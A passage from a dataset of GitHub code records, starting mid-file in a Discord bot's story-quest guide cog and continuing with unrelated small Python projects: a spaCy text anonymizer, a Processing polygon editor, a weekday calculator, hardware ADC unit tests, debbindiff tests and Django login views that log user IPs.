data.description+='\\n\\n__Global__: __{}__\\n{}'.format(self.glossary_keys[g], self.glossary_desc[g])\r\n # data.add_field(name='Global Boost: {}'.format(g.title()),\r\n # value='{}'.format(self.glossary_desc[g]))\r\n # if self.glossary_tips[g] != \"\":\r\n # data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n for b in boosts:\r\n if b != '-' and b !='':\r\n data.description += '\\n\\n__{}__\\n{}'.format(self.glossary_keys[b], self.glossary_desc[b])\r\n # data.add_field(name='{}'.format(b.title()),\r\n # value='{}'.format(self.glossary_desc[b]))\r\n # if self.glossary_tips[b] != \"\":\r\n # data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[b])\r\n if notes != '':\r\n data.description+='\\n\\n__Notes__\\n{}'.format(notes)\r\n # data.add_field(name='Notes', value=notes)\r\n if map in starfire_maps:\r\n data.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'\r\n ''.format(author.display_name),\r\n icon_url=GSHEET_ICON)\r\n else:\r\n data.set_footer(\r\n text='CollectorDevTeam Data + StarFighter | Requested by {}'.format(\r\n author.display_name),\r\n icon_url=COLLECTOR_ICON)\r\n pages.append(data)\r\n i+=1\r\n if verbose:\r\n i = 1\r\n for page in pages:\r\n if map in starfire_maps:\r\n page.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {} | Fight {} of {}'\r\n ''.format(author.display_name, i, len(pages)),\r\n icon_url=GSHEET_ICON)\r\n else:\r\n page.set_footer(\r\n text='CollectorDevTeam Data + StarFighter | Requested by {}'\r\n ''.format(\r\n author.display_name),\r\n icon_url=COLLECTOR_ICON)\r\n await self.bot.say(embed=page)\r\n i+=1\r\n else:\r\n menu = PagesMenu(self.bot, timeout=720, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(pages)\r\n return\r\n\r\n @commands.command(pass_context=True, name='rttl')\r\n async def rttl_paths(self, ctx, map=None, path=None, verbose=True):\r\n \"\"\"Road To The Labyrinth Guide\r\n\r\n \"\"\"\r\n author = ctx.message.author\r\n ucolor = discord.Color.gold()\r\n if ctx.message.channel.is_private is False:\r\n ucolor = author.color\r\n data = discord.Embed(color=ucolor, title='Story Quest Help', description='')\r\n\r\n # starfire_maps = ('6.1.1', '6.1.2', '6.1.3', '6.1.4', '6.1.5', '6.1.6')\r\n valid_maps = []\r\n for k in self.paths.keys():\r\n if k != '_headers' and k != 'emoji' and k != 'map' and k != 'rttl':\r\n valid_maps.append(k)\r\n valid_maps.sort()\r\n if map not in valid_maps and map is not None and path is None:\r\n if '.' in map:\r\n map, path = map.split('.')\r\n map = \"rttl_{}\".format(map)\r\n path = 'path{}'.format(path)\r\n elif \"rttl_{}\".format(map) in valid_maps:\r\n map = \"rttl_{}\".format(map)\r\n else:\r\n return\r\n else:\r\n data.description ='Please select a valid Road to the Labyrinth Chapter:\\n1, 2, 3, 4'\r\n await self.bot.say(embed=data)\r\n return\r\n\r\n print(map)\r\n print(path)\r\n all_paths = self.paths['_headers']['paths']\r\n all_paths = list(filter(lambda a: a != '', all_paths)) #remove \"\" from valid paths\r\n valid_paths = []\r\n for a in all_paths:\r\n if a in self.paths[map].keys() and self.paths[map][a] != \"\":\r\n valid_paths.append(a)\r\n\r\n if path not in valid_paths and path is not None:\r\n if \"path{}\".format(path) in valid_paths:\r\n path = \"path{}\".format(path)\r\n else:\r\n return\r\n elif path is None or path not in valid_paths:\r\n attrs = {}\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n if self.globals[map]['chapter_champ'] != '':\r\n boss = await ChampConverter.get_champion(self, self.bot, self.globals[map]['chapter_champ'], attrs)\r\n data.title = '{} | {}\\nQuest: {}'.\\\r\n format(self.globals[map]['act_title'],\r\n self.globals[map]['chapter_title'],\r\n self.globals[map]['quest_title'])\r\n data.set_thumbnail(url=boss.get_avatar())\r\n print(valid_paths)\r\n\r\n\r\n for p in valid_paths:\r\n if p is not None and p != \"\":\r\n key = '{}-{}-1'.format(map, p)\r\n for emoji in self.all_emojis.values():\r\n if emoji.path == p:\r\n data.add_field(name=emoji.text, value='Quest: {}\\nTiles: {}\\nEnergy: {}\\nNotes: {}'\r\n .format(p[-1:],self.export[key]['tiles'],\r\n self.export[key]['tiles']*3,\r\n self.export[key]['notes']))\r\n continue\r\n gboosts = self.export[key]['global'].split(', ')\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n data.add_field(name='Global Boost: {}'.format(g.title()),\r\n value='{}'.format(self.glossary_desc[g]))\r\n if self.glossary_tips[g] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n message = await self.bot.say(embed=data)\r\n self.included_emojis = set()\r\n for emoji in self.all_emojis.values():\r\n if emoji.path in valid_paths:\r\n try:\r\n print(emoji.emoji)\r\n await self.bot.add_reaction(message, emoji.emoji)\r\n except:\r\n raise KeyError('Unknwon Emoji : {}'.format(emoji.emoji))\r\n self.included_emojis.add(emoji.emoji)\r\n\r\n react = await self.bot.wait_for_reaction(message=message, user=ctx.message.author,\r\n timeout=30, emoji=self.included_emojis)\r\n if react is None:\r\n try:\r\n await self.bot.clear_reactions(message)\r\n except discord.errors.NotFound:\r\n # logger.warn(\"Message has been deleted\")\r\n print('Message deleted')\r\n except discord.Forbidden:\r\n # logger.warn(\"clear_reactions didn't work\")\r\n for emoji in self.included_emojis:\r\n await self.bot.remove_reaction(message, emoji, self.bot.user)\r\n return\r\n emoji = react.reaction.emoji\r\n path = self.all_emojis[emoji].path if emoji in self.all_emojis else None\r\n\r\n if path in valid_paths:\r\n tiles = self.paths[map][path]\r\n tiles = tiles.split(',')\r\n pages = []\r\n i = 1\r\n for tile in tiles:\r\n key = '{}-{}-{}'.format(map, path, tile)\r\n attrs = {}\r\n mob = self.export[key]['mob'].lower()\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n champion = await ChampConverter.get_champion(self, self.bot, mob, attrs)\r\n power = self.export[key]['power']\r\n hp = self.export[key]['hp']\r\n boosts = self.export[key]['boosts'].split(', ')\r\n gboosts = self.export[key]['global'].split(', ')\r\n notes = self.export[key]['notes']\r\n # attack = self.export[key]['attack']\r\n data = discord.Embed(color=CDT_COLORS[champion.klass], title='Road To The Labyrinth\\nChapter {} Quest {} | Fight {}'.format(map[-1:], path[-1:], i),\r\n description='', url=ACT6_SHEET)\r\n tiles = self.export[key]['tiles']\r\n if power != '':\r\n data.set_author(name='{} : {:,}'.format(champion.full_name, power))\r\n else:\r\n data.set_author(name='{}'.format(champion.full_name))\r\n data.set_thumbnail(url=champion.get_avatar())\r\n if tiles != '':\r\n data.description += '\\nTiles: {}\\n<:energy:557675957515845634> {:,}'.format(tiles, tiles*3)\r\n # if power != '':\r\n # data.description += '\\nPower {:,}'.format(power)\r\n if hp != '':\r\n data.description += '\\n<:friendshp:344221218708389888> {:,}'.format(hp)\r\n else:\r\n data.description += '\\n<:friendshp:344221218708389888> ???'\r\n # if attack != '':\r\n # data.description += '\\n<:xassassins:487357359241297950> {}'.format(attack)\r\n # else:\r\n # data.description += '\\n<:xassassins:487357359241297950> ???'\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n data.add_field(name='Global Boost: {}'.format(g.title()),\r\n value='{}'.format(self.glossary_desc[g]))\r\n if self.glossary_tips[g] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n for b in boosts:\r\n if b != '-' and b !='':\r\n data.add_field(name='{}'.format(b.title()),\r\n value='{}'.format(self.glossary_desc[b]))\r\n if self.glossary_tips[b] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[b])\r\n if notes != '':\r\n data.add_field(name='Notes', value=notes)\r\n data.set_footer(\r\n text='CollectorDevTeam Data + StarFighter | Requested by {}'.format(\r\n author.display_name),\r\n icon_url=COLLECTOR_ICON)\r\n pages.append(data)\r\n i+=1\r\n if verbose:\r\n for page in pages:\r\n await self.bot.say(embed=page)\r\n else:\r\n menu = PagesMenu(self.bot, timeout=360, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(pages)\r\n return\r\n\r\n\r\n\r\n\r\ndef check_folders():\r\n folders = ('data', 'data/storyquest/')\r\n for folder in folders:\r\n if not os.path.exists(folder):\r\n print(\"Creating \" + folder + \" folder...\")\r\n os.makedirs(folder)\r\n\r\n\r\ndef check_files():\r\n ignore_list = {'SERVERS': [], 'CHANNELS': []}\r\n\r\n files = {\r\n 'settings.json': {},\r\n 'cdt_glossary.json': {},\r\n 'cdt_paths.json': {},\r\n 'cdt_path_keys.json': {}\r\n }\r\n\r\n for filename, value in files.items():\r\n if not os.path.isfile('data/storyquest/{}'.format(filename)):\r\n print(\"Creating empty {}\".format(filename))\r\n dataIO.save_json('data/storyquest/{}'.format(filename), value)\r\n\r\ndef setup(bot):\r\n check_folders()\r\n check_files()\r\n sgd = StaticGameData()\r\n sgd.register_gsheets(bot)\r\n bot.add_cog(STORYQUEST(bot))\r\n","repo_name":"Trapavko/CollectorDevTeam-mcoc-v2","sub_path":"storyquest/storyquest.py","file_name":"storyquest.py","file_ext":"py","file_size_in_byte":30209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74577613030","text":"import spacy\n\nnlp = spacy.load('en_core_web_sm')\n\ndef anonymize_text(sentences):\n answer = []\n dic = nlp(sentences, disable=['parser'])\n removed_chr = []\n\n for token in dic:\n # token = dic[i]\n print(token.text)\n\n if str(token.pos_) == \"PROPN\":\n \n if len(answer) > 1 and answer[-1] == \" \" and answer[-2][-1] == \"X\":\n answer[-1] = \"X\"\n\n if token.text not in removed_chr:\n answer.append(\"X\" * len(token.text))\n removed_chr.append(token.text)\n\n else:\n answer.append(token.text)\n \n if str(token.pos_) == \"PUNCT\" and len(answer) > 1 and answer[i-1] == ' ':\n answer.pop()\n \n else:\n answer.append(str(token.text))\n\n answer.append(\" \")\n print(answer)\n answer.pop()\n\n return \"\".join(answer)\n\ntext = 'Yuh-jung Youn won the Oscar for best supporting actress for her performance in \"Minari\" on Sunday and made history by becoming the first Korean actor to win an Academy Award.'\ntext1 = 'John is old'\ntext2 = 'Mark Oldham ate an apple'\ntext3 = 'John eats an...did something U.K.'\n# doc = nlp(text)\n\n# str_format = \"{:>10}\"*8\n# print(str_format.format('Text', 'Lemma', 'POS', 'Tag', 'Dep', 'Shape', 'is alpha', 'is stop'))\n# print(\"==\"*40)\n\n# for token in doc:\n# print(str_format.format(token.text, token.lemma_, token.pos_, token.tag_, \n# token.dep_, token.shape_, str(token.is_alpha), str(token.is_stop)))\n\n# print(anonymize_text(text))\n# print(anonymize_text(text1))\n# print(anonymize_text(text2))\nprint(anonymize_text(text3))\n\n","repo_name":"Valentino1994/dayAlgorithm","sub_path":"onedayAlgorithm/2022/Test/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34080268352","text":"# Alexandre B A Villares - https://abav.lugaralgum.com/sketch-a-day\n\"\"\"\nA minimal poly editor\n- Drag points from holes\n- Remove any point with CNTRL + click\n\"\"\"\n\nfrom polys import Poly\nPoly.cell_size = 25\nPoly.text_on = False\n\n# add_library('GifAnimation')\n# from gif_exporter import gif_export\n\n# f_pts = [map(lambda x: x / 5 - 12, pair) for pair in f_pts]\npolys = [Poly([(2, 2), (2, 4), (4, 4), (4, 2)]),\n Poly([(5, 5), (5, 7), (3, 3)]),\n Poly([(-8, -7), (-1, 0), (1, -9)],\n holes=[[(-4, -4), (-6, -6), (-1, -7)], ]),\n ]\n\ndef setup():\n global x_offset, y_offset, order\n size(500, 500, P2D)\n order = width / Poly.cell_size\n x_offset = y_offset = int(order / 2)\n strokeJoin(ROUND)\n f = createFont(\"Fira Mono Bold\", 16)\n textFont(f)\n\ndef draw():\n background(230)\n # grade\n Poly.grid(order)\n \n for p in polys:\n p.plot(x_offset, y_offset)\n\n\ndef mousePressed():\n for i in range(order):\n x = i * Poly.cell_size\n for j in range(order):\n y = j * Poly.cell_size\n io, jo = i - x_offset, j - y_offset # grid origin correction\n if dist(mouseX, mouseY, x, y) < Poly.cell_size / 2:\n if keyPressed and keyCode == CONTROL:\n for p in polys:\n if p.remove_pt(io, jo):\n break\n else:\n for ip, p in enumerate(polys):\n for ipt, pt in enumerate(p.outer_pts):\n if pt == (io, jo):\n Poly.drag = ip\n Poly.drag_pt = ipt\n break\n for ih, h in enumerate(p.holes):\n for ipt, pt in enumerate(h):\n if pt == (io, jo):\n Poly.drag = ip\n Poly.drag_hole = ih\n Poly.drag_pt = ipt\n break\n\ndef mouseDragged():\n if Poly.drag >= 0: # a Poly point has been selected to be dragged\n if Poly.drag_hole == -1: # if no hole wase selected\n polys[Poly.drag].outer_pts[Poly.drag_pt] = (\n int(mouseX / Poly.cell_size) - x_offset,\n int(mouseY / Poly.cell_size) - y_offset)\n else:\n polys[Poly.drag].holes[Poly.drag_hole][Poly.drag_pt] = (\n int(mouseX / Poly.cell_size) - x_offset,\n int(mouseY / Poly.cell_size) - y_offset)\n\ndef mouseReleased():\n Poly.drag = -1 # No poly selected\n Poly.drag_hole = -1 # No hole selected\n Poly.drag_pt = -1 # No point selected\n\ndef keyPressed():\n if key == \" \":\n for p in polys:\n p.outer_pts[:] = clockwise_sort(p.outer_pts)\n for h in p.holes:\n h[:] = clockwise_sort(h)[::-1]\n # if key == \"g\":\n # gif_export(GifMaker, filename=SKETCH_NAME)\n if key == \"s\":\n saveFrame(SKETCH_NAME+\"#.png\")\n if key == \"t\":\n Poly.text_on = not Poly.text_on\n\ndef clockwise_sort(xy_pairs):\n # https://stackoverflow.com/questions/51074984/sorting-according-to-clockwise-point-coordinates\n data_len = len(xy_pairs)\n if data_len > 2:\n x, y = zip(*xy_pairs)\n else:\n return xy_pairs\n centroid_x, centroid_y = sum(x) / data_len, sum(y) / data_len\n xy_sorted = sorted(xy_pairs,\n key=lambda p: atan2((p[1] - centroid_y), (p[0] - centroid_x)))\n xy_sorted_xy = [coord for pair in list(zip(*xy_sorted)) for coord in pair]\n half_len = int(len(xy_sorted_xy) / 2)\n return list(zip(xy_sorted_xy[:half_len], xy_sorted_xy[half_len:]))\n\n\ndef settings():\n from os import path\n global SKETCH_NAME\n SKETCH_NAME = path.basename(sketchPath())\n OUTPUT = \".png\"\n println(\n \"\"\"\n\n\n[{0}](https://github.com/villares/sketch-a-day/tree/master/2019/{0}) [[Py.Processing](https://villares.github.io/como-instalar-o-processing-modo-python/index-EN)]\n\"\"\".format(SKETCH_NAME, OUTPUT)\n )\n","repo_name":"villares/sketch-a-day","sub_path":"2019/sketch_190423a/sketch_190423a.pyde","file_name":"sketch_190423a.pyde","file_ext":"pyde","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"71"}
+{"seq_id":"13850548368","text":"\"\"\"\nFunctionality to calculate day of week.\n\"\"\"\nimport re\n\nDATE_REG_EXP = '^([0-9]{4}[-/]?((0[13-9]|1[012])[-/]?(0[1-9]|[12][0-9]|30)|(0[13578]|1[02])[-/]?31|02[-/]?(0[1-9]|1[0-9]|2[0-8]))|([0-9]{2}(([2468][048]|[02468][48])|[13579][26])|([13579][26]|[02468][048]|0[0-9]|1[0-6])00)[-/]?02[-/]?29)$'\nMONTH_CUM_SUM_DAYS = {\n 1: 0,\n 2: 31,\n 3: 59,\n 4: 90,\n 5: 120,\n 6: 151,\n 7: 181,\n 8: 212,\n 9: 243,\n 10: 273,\n 11: 304,\n 12: 334,\n}\nWEEKDAYS = {\n 0: 'Monday',\n 1: 'Tuesday',\n 2: 'Wednesday',\n 3: 'Thursday',\n 4: 'Friday',\n 5: 'Saturday',\n 6: 'Sunday',\n}\n\n\ndef calc_weekday(date_str):\n \"\"\"\n Calculate day of week based on provided date string.\n\n Arguments:\n date_str (str): provided date in \"YYYY-mm-dd\" format.\n\n Returns:\n week day name as a string.\n \"\"\"\n _validate(date_str=date_str)\n\n year = int(date_str[:4])\n month = int(date_str[5:7])\n day = int(date_str[8:])\n\n num_years_before = year - 1\n num_leap_years_days = calc_num_leap_years_before(year=year, month=month)\n current_year_days = MONTH_CUM_SUM_DAYS.get(month) + (day - 1)\n\n prev_days = num_years_before + + num_leap_years_days + current_year_days\n\n weekday = WEEKDAYS.get(prev_days % 7)\n\n return weekday\n\n\nclass InvalidArgumentError(Exception):\n \"\"\"\n Invalid argument error implementation.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Construct the object.\n \"\"\"\n self.message = 'The provided arguments do not comply restrictions. Value should be in format \"YYYY-mm-dd\".'\n\n def __str__(self):\n \"\"\"\n Define string representation.\n\n Returns:\n Error message as a string\n \"\"\"\n return self.message\n\n\ndef _validate(date_str):\n \"\"\"\n Validate input date string.\n\n Arguments:\n date_str (str): provided date.\n\n Raises:\n InvalidArgumentError: when provided string is not a real date or do not comply format restrictions.\n \"\"\"\n if not re.match(DATE_REG_EXP, date_str):\n raise InvalidArgumentError()\n\n\ndef _is_leap_year(year):\n \"\"\"\n Check whether provided year is leap or not.\n\n Arguments:\n year (int): specified year.\n\n Returns:\n boolean identifier whether provided year is leap or not.\n \"\"\"\n if (year % 4) > 0:\n return False\n\n if (year % 100) > 0:\n return True\n\n if (year % 400) == 0:\n return True\n\n else:\n return False\n\n\ndef calc_num_leap_years_before(year, month):\n \"\"\"\n Calculate number of 29th February dates happened before specified date.\n\n Arguments:\n year (int): specified year.\n month (int): specified month.\n\n Returns:\n number of 29th February dates happened before specified date as an integer.\n \"\"\"\n num_leap_years = year // 4 - year // 100 + year // 400\n\n if _is_leap_year(year):\n if month < 3:\n num_leap_years = num_leap_years - 1 # 29th of February not happened on provided leap year.\n\n return num_leap_years\n","repo_name":"andritar/week-day","sub_path":"weekday/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34241859253","text":"import sys\nimport unittest\nsys.path.append('source')\nfrom UnitTesting.shorthand import *\nfrom AD7766_postprocessing import *\nfrom DataAquisition import MCP3561\n\nclass TestArduinoADCSampling(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.device = MCP3561(sampling_frequency=9.76*1e3)\n\n def setUp(self):\n self.device.Reset() # ONLY WORKS ON PYSERIAL\n\n def testIdentify(self):\n \"\"\"\n Tests the Identify() function to check there are no more bytes than expected and to check that the ID\n does not change from initialization of the device\n \"\"\"\n deviceIDActual = self.device.Identify()\n deviceIDDesired = self.device.deviceID\n self.assertEqual(deviceIDDesired, deviceIDActual)\n self.assertEqual(self.device.inWaiting(), 0) # Verify that there ore no bytes left to be read\n\n def testMeasure(self):\n \"\"\"\n Asserts that the result of a measurement is a set of three bytes, and that no more than 3 bytes are returned\n \"\"\"\n desiredMeasurements = 1\n measuredData = self.device.Measure()\n self.assertEqual(len(measuredData), 3)\n self.assertEqual(self.device.inWaiting(), 0) # Verify that there ore no bytes left to be read\n\n\n def testMeasureByteCount(self):\n \"\"\"\n Asserts that the Configure() function can be used to measure between 1 and 100,000 measurements without\n dropping a single byte.\n \"\"\"\n desiredMeasurementsList = [1, 10, 100, 1000, 10000]\n\n for desiredMeasurements in desiredMeasurementsList:\n desiredBytes = desiredMeasurements * 3\n self.device.Configure(desiredMeasurements)\n data = self.device.Measure()\n actualBytes = len(data)\n self.assertEqual(actualBytes, desiredBytes,\n msg=f'Received wrong number of bytes. Actual bytes: {actualBytes}.' + \\\n f'Desired bytes: {desiredBytes}' + \\\n f'attempt restart of the arduino.\\n')\n\n @unittest.skip(\"Extremely large data transfer (long test)\")\n def testMeasureLargeByteCount(self):\n \"\"\"\n Asserts that we can measure very large numbers of measurements (1 million in this test) without dropping\n any bytes.\n \"\"\"\n desiredMeasurements = int(500000)\n desiredBytes = desiredMeasurements * 3\n self.device.Configure(desiredMeasurements)\n data = self.device.Measure() # If this isn't blocking, it should probably be made blocking.\n actualBytes = len(data)\n self.assertEqual(actualBytes, desiredBytes,\n msg=f'Received wrong number of bytes. Actual bytes: {actualBytes}.' + \\\n f'Desired bytes: {desiredBytes}' + \\\n f'attempt restart of the arduino.\\n')\n\n def testMeasureSynchronizationPoints(self):\n \"\"\"\n Confirm that we get the expected number of data synchronization events when we sample in a given time period.\n Assumes an external 1kHz square wave is being applied to pin 20 on the Teensy.\n \"\"\"\n fSync = 1000\n desiredSynchronizationEvents = 8\n numberMeasurements = int(self.device.measurementRate/fSync * desiredSynchronizationEvents)\n self.device.Configure(numberMeasurements)\n self.device.Measure()\n print(self.device.getSyncData())\n actualSynchronizationEvents = self.device.syncPoints\n self.assertEqual(actualSynchronizationEvents, desiredSynchronizationEvents, msg='Failed to synchronize to external function generator. Is it turned on?')\n\n def testMeasureSynchronizationData(self):\n \"\"\"\n Verify that the synchronization data we get is \"reasonable\" - that is that points are separated by very close\n to their expected frequency of 1kHz. This assumes there is a square wave at 1kHz sending data to the Teensy.\n \"\"\"\n fSync = 1000\n desiredSynchronizationEvents = 3\n numberMeasurements = int(self.device.measurementRate/fSync * desiredSynchronizationEvents)\n self.device.Configure(numberMeasurements)\n self.device.Measure()\n actualSynchronizationEvents = self.device.syncPoints\n syncData = self.device.getSyncData()\n bytesPerDataPoint = 3\n desiredSyncBytes = bytesPerDataPoint * desiredSynchronizationEvents\n\n # check that the data has the right number of bytes in it\n self.assertEqual(len(syncData), desiredSyncBytes)\n measurementPoints = twosToInteger(syncData)\n measurementDeltas = np.diff(measurementPoints)\n timeDeltas = 1 / self.device.measurementRate * measurementDeltas\n approxFrequencies = np.reciprocal(timeDeltas)\n assertAlmostEqual(approxFrequencies[0], fSync)\n assertAlmostEqual(approxFrequencies[1], fSync)\n\n @classmethod\n def tearDownClass(cls):\n cls.device.closeDevice()\n","repo_name":"edmundsj/AD7766_Python","sub_path":"test/test_scpi_communication.py","file_name":"test_scpi_communication.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"33075547972","text":"\"\"\"\nA confederação Nacional de natação prescisa de um programa que leia o ano de nascimento\nde um atleta e mostre sua categoria de acordo a sua idade: \n\"\"\"\nfrom datetime import datetime\n\nnome = input('Diga o nome do nadador que deseja saber qual categoria ele participa: ')\ndata_nasc = (input(f'Diga qual ano o {nome} nasceu: '))\nwhile not data_nasc.isdigit() or len(data_nasc) != 4 or int(data_nasc) > datetime.now().year:\n data_nasc = input(f'Diga qual ano o {nome} nasceu,\\n exemplo: 2004 \\n Diga: ')\n\ndata_atu = datetime.now()\ndata_ano = data_atu.year\nidade = int(data_ano) - int(data_nasc)\n#print(idade)\n\nif idade <= 9:\n print(f'{nome} está na categoria MIRIN.')\n \nelif idade > 9 and idade <= 14:\n print(f'{nome} está na categoria INFANTIL.')\n \nelif idade > 14 and idade <= 19:\n print(f'{nome} está na categoria JUNIOR.')\n \nelif idade == 20:\n print(f'{nome} está na categoria SÊNIOR.')\n \nelse:\n print(f'{nome} está na categoria MASTER.')","repo_name":"ReinaldoGalvao/PYTHON_CURSO_EM_VIDEO","sub_path":"desafio041.py","file_name":"desafio041.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72712581030","text":"import codecs\nimport os.path\nimport pytest\n\nfrom debbindiff.comparators import compare_unknown\n\nTEST_TEXT_ASCII_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/text_ascii1')\nTEST_TEXT_ASCII_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/text_ascii2')\nTEST_TEXT_UNICODE_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/text_unicode1')\nTEST_TEXT_UNICODE_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/text_unicode2')\nTEST_BINARY_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/binary1')\nTEST_BINARY_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/binary2')\n\ndef test_same_binaries():\n difference = compare_unknown(TEST_BINARY_FILE1_PATH, TEST_BINARY_FILE1_PATH)\n assert difference is None\n\ndef test_text_ascii_files():\n difference = compare_unknown(TEST_TEXT_ASCII_FILE1_PATH, TEST_TEXT_ASCII_FILE2_PATH)\n expected_diff = open(os.path.join(os.path.dirname(__file__), '../data/text_ascii_expected_diff')).read()\n assert difference.unified_diff == expected_diff\n\ndef test_text_unicode_files():\n difference = compare_unknown(TEST_TEXT_UNICODE_FILE1_PATH, TEST_TEXT_UNICODE_FILE2_PATH)\n expected_diff = codecs.open(os.path.join(os.path.dirname(__file__), '../data/text_unicode_expected_diff'), encoding='utf-8').read()\n assert difference.unified_diff == expected_diff\n\ndef test_binary_files():\n difference = compare_unknown(TEST_BINARY_FILE1_PATH, TEST_BINARY_FILE2_PATH)\n expected_diff = codecs.open(os.path.join(os.path.dirname(__file__), '../data/binary_expected_diff')).read()\n assert difference.unified_diff == expected_diff\n","repo_name":"dezgeg/debbindiff","sub_path":"tests/comparators/test_generic.py","file_name":"test_generic.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22363042608","text":"from django.shortcuts import redirect, render\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login\nfrom .forms import UserForm\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate\nfrom .forms import LoginForm\n\nfrom django.contrib.auth import logout\n\nimport logging\nlogger = logging.getLogger('django')\n\nimport hashlib\nimport time\nimport os\nfrom pathlib import Path\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nusername = ''\nip = ''\n\n# Create your views here.\n\ndef home(request):\n return render(request, 'home.html')\n\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n new_user = User.objects.create_user(**form.cleaned_data)\n login(request, new_user)\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n print('logger = ', logger, ' __name__ = ', __name__)\n logger.debug('[MODULE] = {} [IP] = {} [USER NAME] = {}'.format('SIGN UP', ip, new_user))\n\n #로그 정보 해시하기\n now = time.localtime()\n now = \"%04d/%02d/%02d %02d:%02d:%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec)\n userinfo = '[TIME]'+ now + ' [IP]' + ip + ' [USER]' + username\n\n print(userinfo)\n userinfo_1 = hashlib.sha256(userinfo.encode())\n finalinfo = (userinfo_1.hexdigest())\n\n hash_txt = os.path.join(BASE_DIR, 'logs') + \"/hash\"\n text = open(hash_txt, 'a')\n data = (userinfo + '\\n'+ '[SHA256] = ' + finalinfo + '\\n')\n text.write(data)\n text.close()\n \n return redirect('home')\n \n else:\n form = UserForm()\n return render(request, 'user_new.html')\n\n\ndef signin(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n global username, ip\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username = username, password = password)\n\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n\n if user is not None:\n login(request, user)\n logger.debug('[MODULE] = {} [IP] = {} [USER NAME] = {}'.format('SIGN IN', ip, username))\n\n #로그정보 해시하기\n now = time.localtime()\n now = \"%04d/%02d/%02d %02d:%02d:%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec)\n userinfo = '[TIME]'+ now + ' [IP]' + ip + ' [USER]' + username\n\n print(userinfo)\n userinfo_1 = hashlib.sha256(userinfo.encode())\n finalinfo = (userinfo_1.hexdigest())\n\n hash_txt = os.path.join(BASE_DIR, 'logs') + \"/hash.txt\"\n text = open(hash_txt, 'a')\n data = (userinfo + '\\n'+ '[SHA256] = ' + finalinfo + '\\n')\n text.write(data)\n text.close()\n\n return redirect('home')\n \n else:\n return HttpResponse('Login failed. Try again.')\n else:\n form = LoginForm()\n return render(request, 'user_login.html')\n\n\n\n\ndef signout(request):\n logout(request)\n global username, ip\n logger.debug('[MODULE] = {} [IP] = {} [USER NAME] = {}'.format('LOGOUT', ip, username))\n ip = ''\n username = ''\n return redirect('home')\n\n\n\ndef google(request):\n logger.debug('[MODULE] = {} '.format('GOOGLE'))\n return render(request, 'google.html')","repo_name":"yejinneer/2021_KHU_G","sub_path":"myproject/myApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
